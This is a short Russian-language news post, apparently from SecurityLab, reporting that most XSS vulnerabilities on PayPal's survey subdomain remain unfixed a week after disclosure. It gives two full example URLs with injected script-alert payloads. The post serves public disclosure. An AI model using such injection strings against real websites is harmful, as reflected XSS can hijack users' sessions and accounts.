На прошлой неделе SecurityLab опубликовал новость о наличии XSS уязвимостей в PayPal. Неделю спустя исправлена только та уязвимость, на которую была прямая ссылка :). Все остальные до сих пор не исправлены. Примеры:
surveyc.paypal.com/dat.php?m=1>"><script>alert('www.securitylab.ru')</script>&c=0&pg=1
surveyc.paypal.com/login/?target=/rep.php%3Fm%3D2%26c%3D0%26pg%3D7"><script>alert('www.securitylab.ru')</script>&explanation=1
PS. Классная у них безопасность!
XSS в PayPal (попытка №2)
XSS в PayPal (попытка №2)
Security
Alert! Зафиксирована утечка экспертных знаний!
Собираем и анализируем опыт профессионалов ИБ
